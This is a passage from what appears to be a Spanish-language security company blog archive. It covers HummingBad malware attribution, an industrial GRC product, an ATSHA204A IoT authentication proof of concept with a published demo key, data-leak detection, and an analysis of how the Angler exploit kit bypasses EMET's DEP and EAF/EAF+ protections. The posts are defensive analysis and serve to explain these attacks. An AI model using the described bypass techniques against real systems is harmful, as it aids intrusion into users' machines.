como payload, que puede ser descargado o estar incrustado en el APK. Buscando muestras que utilicen un fichero muy específico descargado o incrustado Con HummingBad podemos remontarnos "solamente" a principios de 2015 con ejemplos "legítimos" de adware. Con la familia BrainTest podemos hacerlo hasta 2014. Fecha de firma para las muestras que nuestros analistas habían marcado como HummingBad Otro punto de interés es que parece que BrainTest no estaba muy interesada en el seguimiento de sus anuncios con UMENG (la popular plataforma china), mientras que HummingBad parece utilizar UMENG en muchos más ejemplos. Las claves no coinciden en todo caso. Comparando keys entre familias La filosofía coincide, pero el código, la infraestructura, o incluso la "historia" no Parece que Shedun y HummingBad operan desde las raíces de compañias legítimas chinas (OPDA y Yigmob), y que pueden estar relacionados de otras maneras, pero los propietarios, recursos y desarrolladores parecen ser diferentes. Por lo tanto podemos concluir un par de ideas: HummingBad es Hummer, pero no parece ser el mismo malware que Shedun/GhostPush/BrainTest Esto es importante, porque significaría que los cibercriminales están aprendiendo entre ellos mismos. No es sólo el mismo grupo que evoluciona su propio producto. Preocupa puesto que lo más probable es que traten de mejorar técnicamente para ganar cuota de mercado entre ellos, ya que cuentan con "competidores". Conseguir la atribución es siempre un ejercicio arriesgado para cualquier analista (incluido nosotros), pero creemos que HummingBad no es una evolución sino que se trata de un nuevo y peligroso malware de rooteo que se desarrolló paralelamente a otros anteriores (igual que hay diferentes ransomware o familias de troyanos bancarios con exactamente la misma filosofía). Y también creemos que esta familia está aquí para reclamar su cuota de mercado y quedarse por un tiempo.
11 de julio de 2016
SandaS GRC: Gobierno, Riesgos y Compliance en Sistemas de Automatización y Control Industrial
En el pasado Security Day os presentamos las novedades de Sandas GRC relacionadas con las nuevas las capacidades de la plataforma para el Gobierno, Gestión de Riesgos y Compliance en los entornos industriales y a las Tecnologías de las Operaciones. Al unir el concepto GRC típico de los Sistemas de Información (TI) a las Tecnologías de las Operaciones, inauguramos un nuevo concepto al que hemos venido en denominar OT-GRC. En las organizaciones que se apoyan sobre procesos industriales, los Servicios de Negocio están sustentados tanto por Tecnologías de la Información como por Tecnologías de las Operaciones. Ambas componen Sistemas de Información y Sistemas de Automatización y Control Industrial (IACS), respectivamente. La línea que separa ambos mundos cada vez es más difusa y procesos como la Planificación de la Demanda, la Optimización de la Producción, la Gestión de la Distribución o la Monitorización del Consumo, cada vez más, son Procesos de Negocio que utilizan tanto recursos TI como OT. Esta convergencia aporta valor a Negocio y, a su vez, incrementa la interdependencia entre los Tecnologías de la Operación y TI. Con el transformado de esta convergencia TI – OT, los organismos reguladores tales como el International Electrotechnical Comision están ya desarrollando marcos normativos aplicables a los Sistemas Industriales y alineados con TI. La ISA/IEC 62443-2-1 Establishing an IACS Security Program se encuentra fase de desarrollo y permite: Alinear los Sistemas de Gestión de la Seguridad de TI (ISO 27001:2013) con los IACS. Amplía los controles de ISO 27002:2013 con requisitos específicos de Ciberseguridad Industrial. Introduce nuevos controles específicos para Ciberseguridad Industrial. La implantación de un Sistema de Gestión de la Seguridad en los Sistemas de Automatización y Control Industrial (IACS-SMS) pasa por: 1. La identificación de los Activos de las Tecnologías de las Operaciones que componen los IACS. ISA 95 es la referencia de IEC-62443 para identificar los activos. Describe cinco niveles dónde se distribuyen los Activos desde los más próximos a Negocio hasta la propia Red de Campo de la planta industrial. 2. La Identificación de los Activos de OT se completa con la identificación de las relaciones de dependencia. De manera que sea posible determinar qué activos y en qué medida impactan en Negocio. 3. Y dado el paradigma de convergencia que estamos describiendo, la identificación de estas dependencias debe reflejar, también, la interrelación entre los Sistemas de TI y los IACS para que el alcance el Sistema de Gestión de la Seguridad sea integral. El módulo de Arquitectura Empresarial de SandaS GRC permite abordar este ejercicio de identificación de Activos y Dependencias con el Modelado Visual de un Modelo de Arquitectura Empresarial que describe de qué manera los elementos de Tecnología (OT y TI) dan soporte a Negocio a través de Sistemas (Industriales y de Información). La guía de implementación de un IACS-SMS (ISA/IEC 62443-2-1), capítulo 8, determina que se ha de definir la valoración de los activos. Esta valoración, con SandaS GRC la podemos definir en función de los Servicios de Negocio para los que un activo es requerido. De esta manera conseguimos un enfoque de la seguridad OT desde la perspectiva de Negocio ya que un activo de OT, como pueda ser un PLC tendrá una valoración tan alta como los Servicios de Negocio para los cuales es necesario. Para determinar el valor de un activo contamos con una matriz de valoración en la que se disponen los criterios y dimensiones de valoración que se han de considerar. Naturalmente, estos criterios de valoración han de estar alineados con las especificaciones propias de la Industria (ISA/IEC 62443-2-1). Otra modalidad para determinar la criticidad de un activo es el BIA (Business Impact Analysis) a través del cual podemos determinar cuáles son los Objetivos de Continuidad de la Compañía respecto a un determinado Servicio. El BIA permite definir el impacto que supone la no disponibilidad de un servicio a lo largo del tiempo: Sea de un modo u otro el valor que se determine para un Activo, repercutirá sobre todos los que son requeridos por él. Así pues, vemos como los activos de la capa de OT heredan el valor del Servicio de Negocio para el que son requeridos: Del mismo modo, se puede utilizar el modelo representado en el Asset Studio para definir requisitos de Continuidad de Negocio (ISO 22301) e identificar fácilmente activos críticos, es decir, aquellos que sus condiciones de recuperación reales no cumplen con los requisitos de continuidad que se definen desde Negocio. Veamos un ejemplo muy sencillo, desarrollado con SandaS GRC. Dado un Servicio que para la Compañía se determina que debe cumplir con un Tiempo de Recuperación Objetivo (RTO) de una hora y un dispositivo HMI cuyo Tiempo de Recuperación Actual (RTA) definido por los técnicos es de dos horas. Nos encontramos con este escenario que nos muestra en color rojo los activos críticos que no cumplen con los requisitos de Continuidad de Negocio definidos por la Compañía. ISA/IEC 62443 en su capítulo C.3.3.3 describe el Proceso de Apreciación de Riesgo. Con SandaS GRC se puede desarrollar este proceso alineado con la ISO 31000 e ISO 27005. El proceso de Apreciación de Riesgos se desarrolla en las fases de Identificación de los Escenarios de Riesgo, Analisis, Evaluación y Tratamiento. La Identificación de los Escenarios de Riesgos consiste en determinar qué Eventos de Amenaza pueden materializarse sobre los distintos Activos de la Organización. Para casos de Ciberseguridad Industrial, SandaS GRC se ha enriquecido con el catálogo de Amenazas del NIST-SP 800-82 Guide to Industrial Control Systems (ICS) Security. Por lo tanto, a la hora de identificar las amenazas que se pueden materializar sobre los activos de tipo industrial, podremos seleccionar dentro de este catálogo las más adecuadas: En la fase de Análisis de los Escenarios de Riesgos, se valorará el nivel de degradación sobre el valor del activo para cada una de las dimensiones de valoración que aplique. Con este nivel de degradación SandaS GRC calcula unas Consecuencias que, junto con la Probabilidad determinan un Nivel de Riesgo. Con SandaS GRC el Analista de Riesgos podrá determinar tanto la probabilidad como las Consecuencias con las escalas del ISA/IEC 62443-2-1: Una vez determinado el Nivel de Riesgo para todos los Escenarios apreciados, la fase de Evaluación facilita un ejercicio de priorización identificando aquellos que se consideran Inaceptables y merecen mayor atención. En el propio Proceso de Apreciación de Riesgos se definen dos umbrales de riesgo que determinan: 1. El Nivel de Riesgo Tolerable más alto 2. El Nivel de Riesgo Ampliamente Aceptable más alto. De esta manera en la pestaña de Evaluación los Escenarios de Riesgos se distribuyen en tres columnas: TOLERABLES, AMPLIAMENTE ACEPTABLES e INACEPTABLES. Respecto a los Tolerables y los Inaceptables, en principio, no hay duda. Debido al nivel de riesgo calculado han quedado claramente definidos en una u otra región. Respecto a los que están en la franja central los “AMPLIAMENTE ACEPTABLES”, el analista deberá tomar una decisión razonada respecto a ellos, es decir, debe moverlos a la columna de TOLERABLES o INACEPTABLES en función de su criterio experto. En SandaS GRC es tan fácil como hacer clic y arrastrar cada una de las tarjetas que representa al escenario de riesgo. Utilizamos esta metodología ALARP ( As Low As Reasonably Possible) para facilitar que el ejercicio de Evaluación sea lo más preciso posible ya que deberíamos dejar la franja de en medio lo más estrecha posible. En el funnel vemos la representación gráfica. Finalmente, la fase de Tratamiento sirve para determinar qué acciones se van a toma mejorar los Escenarios de Riesgos apreciados. Las acciones típicas son Modificar, Evitar, Compartir o Retener el Riesgo. Para mejorar los Escenarios de Riesgo, disponemos de dos opciones fundamentales: definir un Proyecto con un conjunto de tareas dirigidas a mejorar las expectativas de probabilidad y/o degradación de las amenazas apreciadas o aplicar Controles, con la misma finalidad. Una vez más, y para escenarios de Ciberseguridad Industrial SandaS GRC cuenta con un Catálogo de Controles específico para estas amenazas (ANSI-ISA-99.02.01-2009). Al asociar un Control sobre un escenario de riesgo no sólo estamos identificando los tratamientos que vamos a aplicar sino que estamos creando una Tarea dentro de un Proyecto a la que vamos a poder hacer el debido seguimiento con el Gestor de Proyectos de SandaS GRC. Así pues, podemos hacer un Plan de Tratamiento del Riesgo integral, al cohesionar en un mismo Modelo de Arquitectura Empresarial una visión holística de TI + OT, coexistiendo en la plataforma los catálogos de amenazas, controles y marcos normativos para los análisis diferenciales tanto de IT como de OT, en definitiva, aplicando el paradigma GRC a la Ciberseguridad Industrial. *También te puede interesar: Security Day 2016_Security Evolution ElevenPaths anunciamos nuestras nuevas alianzas estratégicas en nuestro III Security Day ElevenPaths announced its new strategic alliances in the third Security Day Qué hemos presentado en el Security Day 2016 (I) Qué hemos presentado en el Security Day 2016 (II): “Unidos somos más fuertes” Más información en elevenpaths.com
7 de julio de 2016
Seguridad criptográfica en IoT (y VI)
La proliferación de dispositivos y plataformas de servicios IoT está siendo mucho más rápida que la adopción de medidas de seguridad en su ámbito. Ante la apremiante necesidad de mecanismos que garanticen la autenticación, integridad y confidencialidad, tanto de las comunicaciones como de los propios dispositivos, se tiende a trasladar las soluciones criptográficas contrastadas en la IT tradicional, como son los certificados digitales de clave pública sobre protocolos SSL/TLS. Seguimos avanzando en el estado del arte de las soluciones criptográficas para IoT. PoC Web Aunque la descripción literal de los comandos de autenticación pueda parecer enrevesada, una vez implementados dentro de una librería de código, su utilización se vuelve muy sencilla, como se observa a continuación: A modo de simple prueba de concepto (PoC) hemos implementado el caso de uso práctico de u n dispositivo IoT que debe autenticarse ante un servicio web de forma robusta, utilizando hardware criptográfico para ello. Para que el ejemplo pueda hacerse extensivo al público general, se emplea Arduino como entorno de desarrollo, sobre una plataforma ESP8266 que facilita el acceso a la web mediante su interface Wifi. Podría utilizarse cualquier módulo ESP8266, en este caso se ha empleado un NodeMCU v0.9, cargando un sketch generado a partir del core ESP8266 para Arduino.Como hardware criptográfico se ha elegido un Cryto-Authenticator Atmel SHA204A conectado externamente al módulo NodeMCU. De las diferentes librerías para Arduino que hay para manejar el SHA204A, la que mejor se adaptaba de forma general, y más trabajada se encontraba, era el trabajo de Nusku de 2013. No obstante, no parecería funcionar de forma uniforme en diferentes dispositivos, y presentaba algunas carencias importantes. Hemos solucionado estos problemas publicando nuestro propio fork en Github. La autenticación en el servicio web se realiza insertando en la petición HTTP (GET request) un token de autenticación. Esta es una practica muy común y extendida entre los más importantes sistemas de autenticación web. Para ello se añade la cabecera (header) " Authorization", con los parámetros adecuados. Estos deben incluir el tipo de token " 11PATHS-HMAC-256", junto a los valores correspondientes codificados en formato Base64. Para simplificar el proceso, la cabecera incluye además del “id” del dispositivo, el " nonce" (challenge) y la " base" utilizados para calcular la firma " signature" de verificación, aunque el protocolo soporta el que challenge lo proporcione el servidor. Al enviar todos estos datos en la petición, seria posible volver a re-utilizar peticiones capturadas. Para evitar esta debilidad se agrega el timestamp como parte de la petición a firmar en formato unix-time. GET /?timestamp=1458647701 HTTP/1.1rn Para poder realizar la firma de la petición HTTP con el Atmel SHA204A, esta se resume a 20 bytes mediante el algoritmo SHA-1. El core de Arduino para ESP8266 incluye esta función en la librería " Hash.h", pero en caso de utilizar otra plataforma se puede añadir desde la Crytosuite para Arduino. Con los 20 bytes obtenidos se invoca el comando Nonce del SHA204A, obteniendo los 32 bytes resultantes a modo de reto, que son almacenados. Seguidamente se invoca el comando HMAC indicando el número de slot que contiene clave con la que se calculará la HMAC-SHA-256, junto al modo de ejecución. Conocidos estos valores (modo y slot) se puede deducir la base de 24 bytes añadida al calculo. El resultado de este comando serán los 32 bytes correspondientes a la firma de la petición. Estos valores, junto con el " id" que asignemos al dispositivo, serán los parámetros en base64 que incluirá la cabecera. La codificación en base64 se realiza utilizando la librería de Adam Rudd. Authorization: 11PATHS-HMAC-256 id="EjEjEg==", nonce="LmzzEpRnXvqmvnbOSobGp1VysR/wEpWoMNaY2Miew5g=", base="EQACAAAAAAAAAAAAAAAA7gAAAAABIwAA", signature="4qnOa5ZGecdzC+DscOSuOhJ64LeB1jTieJATUWPoIZE=" El servicio web podrá verificar la autenticidad del dispositivo IoT que realiza la petición, realizando los mismos cálculos y comparando los resultados. Para ello, tan solo debe conocer la clave de 32 bytes asignada al dispositivo por su "id". Como parte de la demostración, se ha publicado el servicio web de ejemplo en la url: http://sha204a.cf Este servicio web responderá con un JSON que contendrá información relativa a la autenticación, en caso de ser válida, o en su defecto, con los detalles del error que se haya producido. Puede ser utilizado libremente para la realización de pruebas, ya que responde a cualquier id, que haya firmado con la clave de ejemplo: " EB0C68BF96E8C26635D3450293D2FC501A63A09924FE90A7BD916AC521FDE0AA" En este ejemplo no se produce una autenticación recíproca, es decir; la repuesta del servicio web no contiene ningún parámetro destinado a verificar su propia legitimidad, aunque hubiera sido fácil haberlo incorporado. Usualmente se delega esta condición al establecer una conexión segura SSL (https) donde se verifica el certificado del servidor web. El código del sketch Arduino es muy simple. Gestiona la conexión a Internet, mediante la librería " WiFiManager.h", la cual si no se ha configurado o no está disponible el SSID o su credencial no es válida, levanta un AP con un portal cautivo desde el que configurar la red Wifi. Una vez establecida la conexión a Internet, se establece la hora actual s través de un servidor NTP. Cada vez que se pulse el botón FLASH, realizará una petición autenticada por el SHA204A al servicio web configurado. Para probar la conexión al servicio web se puede utilizar un simple Script en BASH que simula el cálculo de la firma tal y como lo haría el ATSHA204A y realiza al petición web. Tanto este Shell Script, como el código Arduino para el módulo IoT, y el código en PHP del servicio web están publicados en este espacio de Github: https://github.com/latchdevel/crypto-iot Con toda la información facilitada es posible deducir fácilmente el número de slot que ocupa la clave utilizada como ejemplo en el ATSHA204A. La primera persona que nos explique cómo en la Community de ElevenPaths, recibirá un módulo de evaluación Atmel CryptoAuthXplained. * Seguridad criptográfica en IoT (I) * Seguridad criptográfica en IoT (II) * Seguridad criptográfica en IoT (III) * Seguridad criptográfica en IoT (IV) * Seguridad criptográfica en IoT (V) * Seguridad criptográfica en IoT (y VI) Jorge Rivera jorge.rivera@11paths.com
20 de junio de 2016
Un kit de exploits de masas que puede eludir EMET: ¿hora de preocuparse?
FireEye ha hecho un buen descubrimiento: algunos exploits de Angler pueden eludir algunas de las defensas introducidas por EMET. Al margen de los detalles técnicos (que repasaremos) la aparición de estas fórmulas en un kit de exploits de masas plantea teorías interesantes. EMET de Microsoft es una herramienta que actúa en una de las fases críticas del aprovechamiento de vulnerabilidades que habitualmente acaban en infección con malware: las técnicas de explotación y salto de medidas de seguridad. Es una solución más eficaz porque en esta etapa del ataque, las posibilidades de un atacante están limitadas, mientras que el abanico a la hora de aprovechar vulnerabilidades nuevas o viejas o de hacer que el malware pase desapercibido, es de un ancho infinito y cualquier defensa juega en desventaja. Sin embargo, las técnicas de exploiting son relativamente pocas y conocidas. EMET juega con el concepto de intentar detectar que se está haciendo uso de estas técnicas (unas decenas) y evitar que el exploit llegue a lanzar el payload. De ahí que sea una herramienta fundamental, que no depende de firmas, parches, actualizaciones… muy rara vez aparecen nuevas fórmulas de exploiting para lanzar payloads, y solo de vez en cuando métodos para eludir todo EMET en sí mismo. No estamos ante ninguno de los dos casos, puesto que las técnicas ya son conocidas, es solo que no es habitual verlas "ahí fuera". Veamos los detalles técnicos. Configuración de EMET Angler elude DEP Lo que ha detectado FireEye es que Angler está eludiendo DEP. Eso se hace desde siempre porque DEP viene activo por defecto en el sistema y lo aprovechan los programas que suelen ser explotados. Desde el punto de vista del atacante, desactivar DEP consiste fundamentalmente en llamar a VirtualProtect y VirtualAlloc marcando la página como de ejecución. Pero para hacerlo, normalmente se utilizan técnicas muy maduras y eficaces de ROP. Sin embargo, Angler innova. Llama directamente a las rutinas VirtualProtect y VirtualAlloc dentro de Flash.ocx y Coreclr.dll (de SilverLight). Eluden DEP y la detección de técnicas ROP que heurísticamente intenta detectar EMET, simplemente porque no las usan. Lo cierto es que esto es interesante, pero no "preocupante". DEP no es lo más difícil de eludir para un atacante. ASLR suele ser más complicado. EMET todavía tendría la capacidad de "cazarlo". ¿Pero dónde está VirtualProtect? EAF y EAF+ Para eludir ASLR, el shellcode normalmente accede a la Export Table de una librería e intenta resolver la dirección de las API, habitualmente GetProcAddress. Export Address Table Filtering (EAF) y EAF+ son técnicas de EMET que pretenden filtrar ese acceso, para que no cualquiera pueda llegar a una DLL y pedir la dirección de esas funciones necesarias para ejecutar el código. Pero existe un truco: acceder a la Import Table de una librería que se importe en cada proceso. Y ese es el caso de user32.dll, que a su vez es el caso que utiliza Angler. Es importante destacar que esto ya se conocía como método para eludir EMET, y como método general de exploiting desde hace años. Es más, el propio Microsoft avisa en general de que EAF es un método de protección "débil" por sí mismo. Angler usa este truco en un exploit de Silverlight, no protegido por EAF+. Pero con Flash es diferente, porque queda protegido por EAF y EAF+. EAF+ es exactamente lo mismo que EAF pero con una lista negra de librerías predefinida y solo en Internet Explorer (aunque todo es configurable). Flash.ocx está en la lista negra, por tanto al atacante no le vale con eludir EAF con las múltiples técnicas conocidas, sino que para explotar esa librería, necesitaría no estar en la lista negra… u otra técnica. Así que usa igualmente la Import Table de Flash.ocx (del que ya conoce la base) y, a partir de kernel32.dll, localiza VirtualAlloc y otras APIs para el resto del ataque, eludiendo EAF+. Configuración de EAF+ en EMET, la lista negra de dlls a las que no se le puede sacar la tabla de exportación Luego lanza el código de TeslaCrypt en este caso, y si utiliza infección "Fileless" (que evita almacenar nada en disco) se las ingenia para crear un proceso fuera del radar de EMET. Conclusiones En resumen, esto se trata de un excelente trabajo en exploiting con técnicas interesantes. Los matices y reflexiones que podemos extraer son varios. El hecho de que técnicas de exploiting muy avanzadas lleguen a un exploit kit de masas sí es preocupante, no el hecho de eludir EMET en sí mismo. EMET tiene sus limitaciones, aunque sea una herramienta más eficaz por definición (sus "enemigos" son menos) ha sufrido varios problemas de implementación y aplicación de técnicas fallidas que ya han sido descubiertas. Algunos problemas han sido subsanados y otros por definición, nunca podrán serlo. Además, a efectos prácticos y aunque no hay datos, parece que EMET no es una herramienta popular entre el usuario medio, así que el que se eluda en este kit, quizás no haga que se ganen muchas más víctimas. Así que surge la duda: ¿por qué molestarse en sortear una barrera tan poco popular? Intentemos ver más allá. Hace poco Microsoft sugería (de forma un tanto controvertida) que muchas de las características de EMET ya venían incluidas en Windows 10, y que EMET no era necesario. Lo cierto es que es tan necesario que lo que está ocurriendo poco a poco es que el sistema operativo, de serie, incluye funcionalidades que se han ideado en un primero momento para EMET, y que está sirviendo como campo de pruebas. Por tanto, lo que realmente puede revelar este descubrimiento es que los atacantes de masas están dando el siguiente paso. Igual que cuando apareció DEP activo por defecto en Windows XP en el verano de 2004 con el Service Pack 2, o como cuando en 2006 Windows Vista introdujo ASLR en el mundo Windows… Los atacantes tuvieron que comenzar a pelar contra nuevas barreras que ya venían "de serie" porque comenzaba a complicarse las técnicas pero tenían que seguir garantizando los niveles de infección. Algunos afirmaron que se les acabó el chollo, y que tendrían muy difícil la explotación… Pero los atacantes lo consiguieron y "normalizaron" el eludir DEP o ASRL en sus exploits. Así que a partir de de Windows 10 o su sucesor, quizás las mejoras contra el aprovechamiento de exploits de serie irán mejorando, pareciéndose probablemente a lo que hoy es EMET. Y estos pueden ser los primeros pasos que allanen el camino a los exploits kits del futuro contra lo que venga tras Windows 10. En concreto, contra Edge, que sí que mejora sustancialmente a Internet Explorer. Por último, solo recordar que esto se ha probado en Windows 7, con exploits para Flash y Silverlight, ambos bajo Internet Explorer de 32 bits. Windows 7 ya lleva un Internet Explorer desactualizado por definición porque se ha descontinuado, por tanto, su usuario tiene muchos otros problemas de los que preocuparse (entre otros, la amplia gama de vulnerabilidades que puede aprovechar el atacante para intentar lanzar esos exploits). Y por supuesto, recordad siempre que EMET no es perfecto, ni nada lo será nunca, pero es una herramienta imprescindible. Sergio de los Santos ssantos@11paths.com @ssantosv
13 de junio de 2016
Data Loss Detection: El caso de Panamá Paper y cómo proteger tus propios “papeles”
En todas las organizaciones manejamos documentos que si llegaran a estar disponibles públicamente dañarían a nuestro negocio: datos de carácter personal, listas de clientes o proveedores, información de nuevos productos, información financiera, planes de inversión o desinversión, propiedad intelectual etc. En el caso de los Papeles de Panamá, la mayor fuga de información en la historia que afectó a una empresa de servicios jurídicos y empresariales en Panamá llamada Mossack Fonseca, vimos un ejemplo claro del impacto que puede tener una fuga. Se trata de una base de datos de tamaño de 2,6TB con 11,5 millones de documentos donde después de su análisis se vio que aparecían 140 políticos de más de 50 países y compañías offshore en 21 paraísos fiscales. Entre los afectados hubo jefes de estado, ministros y sus socios. El sector financiero representa un 7% del PIB de Panamá así que el daño en la confianza puede incluso afectar el propio país. A día de hoy no se conoce ni quien provocó la fuga ni el método utilizado para obtener el acceso y realizar la filtración. La información fue entregada al periódico alemán Süddeutsche Zeitung utilizando mecanismos de comunicación encriptados para garantizar el anonimato de las personas detrás de la misma. Mossack Fonsceca declaró que hubo un ataque tipo spear phishing (añadir referencia a definición) a través de su servidor de email sin especificar más. No obstante, algunos expertos en seguridad han manifestado algunas dudas sobre si quizá hubo combinación de otros métodos o incluso la complicidad de un insider dada la complejidad de realizar una filtración de tal tamaño de información de forma remota y sin ser detectado por los sistemas de seguridad de la empresa. No obstante, el caso de Panamá no es un caso único. Es solo la punta de un Iceberg de fugas de información que generalmente no ven la luz del día. Muchas no llegan nunca a ser publicadas o, peor aún, ni conocidas por sus víctimas. Según nuestros analistas en el primer cuatrimestre del 2016 hubo al menos 330millones de registros filtrados. Esta información se encuentra escondida en otro Iceberg. El de la web visible y la web oculta. Al contrario que los Papeles de Panamá, la información filtrada en la mayoría de los casos no ve la luz del día en la web pública sino se queda en sistemas de terceros no accesibles por cualquiera, en foros privados de hackers, o mercados negros en redes anónimas como es la red Tor. Los últimos años hemos aprendido todos que la Ciberseguridad no puede basarse solamente en defensas. Cualquier organización tiene que asumir que será vulnerada y por tanto deber ser resiliente: poder detectar rápido cualquier problema y poder responder con agilidad y efectividad para minimizar el impacto. Lo mismo aplica en el caso de las fugas. Los sistemas de prevención de fugas de información (DLP o Data Loss Prevention) ayudan en reducir este riesgo, pero no lo eliminan. Nace por tanto un concepto diferente, el de Detección de Fugas de Información (DLD o Data Leak Detection). El DLD consiste en tener la capacidad de acceder a todos estos lugares públicos y ocultos para recuperar información filtrada de nuestra empresa, información que igual ni sabemos que fue robada y retirarla antes que se convierta en un problema. DLD requiere una combinación de tecnología y de expertos para poder llegar a los sitios underground y procesar altos volúmenes de información con el fin de encontrar información sensible para una organización. Dentro de nuestro servicio de CyberThreats estamos continuamente haciendo este trabajo, para poder avisar a nuestro clientes los antes posibles de documentos sensibles que están a disposición de terceros: credenciales robadas, tarjetas de crédito, facturas, planes de marketing , diseños de producto y cualquier otro “papel” que importa al negocio de nuestros clientes. Para más información sobre cómo evitar su propio caso de Papeles de Panamá consulte url del servicio. *También te puede interesar: Nuevo informe sobre “las grandes fugas de información del primer cuatrimestre de 2016″ Nuevo informe: Ciberamenazas financieras Q4 2015 Más información en elevenpaths.com
7 de junio de 2016
Seguridad criptográfica en IoT (V)
La proliferación de dispositivos y plataformas de servicios IoT está siendo mucho más rápida que la adopción de medidas de seguridad en su ámbito. Ante la apremiante necesidad de mecanismos que garanticen la autenticación, integridad y confidencialidad, tanto de las comunicaciones como de los propios dispositivos, se tiende a trasladar las soluciones criptográficas contrastadas en la IT tradicional, como son los certificados digitales de clave pública sobre protocolos SSL/TLS. Seguimos avanzando en el estado del arte de las soluciones criptográficas para IoT. Cálculo de HMAC La ejecución del comando HMAC, al igual que ocurre con otros comandos del ATSHA204A, debe ir precedida de la ejecución del comando Nonce. El objetivo del comando Nonce es poblar el registro interno de 32 bytes llamado TempKey, generando o cargando un desafío (challenge), que será utilizado en posteriores comandos. El comando Nonce tiene tres modos de operación. Los modos 0x00 y 0x01 son los más comunes. En estos modos se invoca el comando Nonce proporcionándole un número de 20 bytes como entrada, al cual responderá devolviendo un número aleatorio de 32 bytes internamente generado a modo de desafío (challenge). A este número aleatorio de 32 bytes se le concatenan los 20 bytes recibidos, junto a tres bytes más: 0x16, el modo y 0x00. Y sobre el conjunto de 55 bytes se calcula el resumen SHA-256 que es almacenado en la TempKey. Adicionalmente se modifican dos registros binarios: TempKey.SourceFlag a valor 0, significado origen aleatorio. TempKey.Valid, a valor 1, significando que la TempKey es utilizable. La diferencia entre el modo 0x00 y 0x01, es que el segundo caso no se actualiza la semilla del generador de números aleatorios, algo que Atmel no recomienda. En modo 0x03 es utilizado para poblar la TempKey directamente, sin la generación del número aleatorio, ni calculo del SHA-256, a modo de bypass. Si el comando Nonce ha finalizado de forma satisfactoria, estableciéndose el bit TempKey.Valid a valor 1, es posible a continuación invocar el comando HMAC. La llamada al comando HMAC se realiza proporcionado únicamente como parámetros de entrada su modo de operación, y el número del slot que contiene la clave a utilizar en el cálculo HMAC. La respuesta a este comando será el número de 32 bytes resultante del computo HMAC-256 sobre un total de 88 bytes formados por: Conjunto de 32 bytes de valor 0x00. Contenido de 32 bytes de la TempKey. Base de 24 bytes determinada por el modo de operación. El comando HMAC presenta múltiples modos de operación, los cuales determinaran que contenido de la zona OPT y del número de serie (SN) del dispositivo se incorporaran a la base. Puede no incorporarse ninguno de estos elementos, estableciéndose los últimos 20 bytes de la base a 0x00. La base del cálculo HMAC comenzará siempre por el byte 0x11, seguido del byte de modo, y dos bytes más que indican el slot que ocupa la clave con la que se realizará el computo HMAC-SHA-256. El tercer bit menos significativo del byte de modo, debe coincidir con el valor del TempKey.SourceFlag establecido anteriormente por el comando Nonce. En todas las comunicaciones con el dispositivo ATSHA204A, tanto entrantes como salientes, se agregan dos bytes de control de redundancia cíclica CRC para garantizar la integridad, tanto de la invocación del comando como de su respuesta. En la próxima entrega, a modo de simple prueba de concepto (PoC) implementaremos el caso de uso práctico de un dispositivo IoT que debe autenticarse ante un servicio web de forma robusta, utilizando hardware criptográfico. * Seguridad criptográfica en IoT (I) * Seguridad criptográfica en IoT (II) * Seguridad criptográfica en IoT (III) * Seguridad criptográfica en IoT (IV) * Seguridad criptográfica en IoT (V) * Seguridad criptográfica en IoT (VI) Jorge Rivera jorge.rivera@11paths.com
6 de junio de 2016
Seguridad criptográfica en IoT (IV)
La proliferación de dispositivos y plataformas de servicios IoT está siendo mucho más rápida que la adopción de medidas de seguridad en su ámbito. Ante la apremiante necesidad de mecanismos que garanticen la autenticación, integridad y confidencialidad, tanto de las comunicaciones como de los propios dispositivos, se tiende a trasladar las soluciones criptográficas contrastadas en la IT tradicional, como son los certificados digitales de clave pública sobre protocolos SSL/TLS. Seguimos avanzando en el estado del arte de las soluciones criptográficas para IoT. Librerías Open Source Junto a una detallada documentación, Atmel facilita librerías de código abierto para el manejo de los dispositivos criptográficos desde su línea de microcontroladores y SoCs. Partiendo de estas librerías comenzaron a aparecer adaptaciones a diferentes entornos, destacando una vez más el trabajo de Josh Datko, que desde Cryptotronix facilita numerosos ejemplos tanto para Linux como para Arduino. Sobresale especialmente el driver para Linux del Atmel SHA204A, llamado Hashlet, que ha servido como punto de partida para otros muchos desarrollos. Para la plataforma de Arduino existen diferentes adaptaciones, cada una de ellas con sus pros y contras, por lo que habrá que seleccionar aquella que mejor se adapte a cada necesidad particular. Atmel SHA204A El Atmel SHA204A es uno de los dispositivos criptográficos más sencillos y fáciles de utilizar, aunque dispone de una gran variedad de funciones de relativa complejidad. Su funcionamiento se basa en el computo de resúmenes SHA-256, utilizados para generar MAC/HMAC (Message Authentication Code) a partir de claves almacenadas internamente. Dispone de 16 slots para almacenar claves de 256 bits (32 bytes) de longitud, los cuales pueden disponer de diferentes configuraciones de acceso y uso, definidas durante la personalización del dispositivo. Junto a una zona de configuración de 88 bytes y un zona OTP (One Time Programable) de 64 bytes de longitud. Posee un generador de números aleatorios, con el que implementa operaciones de desafío-respuesta sin exposición de claves (MAC, CheckMac, GenDig). Soportando mecanismos de rotación de claves "Key Rolling" (DeriveKey).Se identifica unívocamente mediante un número de serie (SN) de 72 bits definido de fábrica no modificable. Cuenta con abundante documentación oficial disponible en internet, junto con un gran número de ejemplos desarrollados por la comunidad Open Source. Pese a que implementa 14 comandos, con tan solo dos de ellos se puede desarrollar un uso completamente funcional, como veremos a continuación. Personalización Antes de poder utilizar cualquier dispositivo criptográfico es necesario establecer sus claves únicas, las opciones de configuración, y bloquear las zonas de configuración y OTP. Este proceso de conoce como " personalización", siendo irreversible; una vez realizado no existe posibilidad de vuelta atrás, los parámetros establecidos permanecerán inmutables. La personalización del ATSHA204A se puede realizar muy fácilmente desde Linux utilizando el “hashlet” de Cryptotronix, tal y como se describe en su documentación. Una vez ejecutado el comando de personalización, las claves únicas serán definidas y configuradas de la siguiente manera: Si se dispone de un kit de desarrollo de oficial de Atmel, es posible realizar el proceso de personalización desde las herramientas que incorpora, pero en cualquier caso, se hace imprescindible seguir las indicaciones del fabricante. En la próxima entrega, veremos cómo funciona técnicamente el cálculo del HMAC en Normal 0 21 false false false ES JA X-NONE /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Tabla normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-priority:99; mso-style-parent:""; mso-padding-alt:0cm 5.4pt 0cm 5.4pt; mso-para-margin:0cm; mso-para-margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:12.0pt; font-family:"Calibri","sans-serif"; mso-ascii-font-family:Calibri; mso-ascii-theme-font:minor-latin; mso-hansi-font-family:Calibri; mso-hansi-theme-font:minor-latin;} ATSHA204A. * Seguridad criptográfica en IoT (I) * Seguridad criptográfica en IoT (II) * Seguridad criptográfica en IoT (III) * 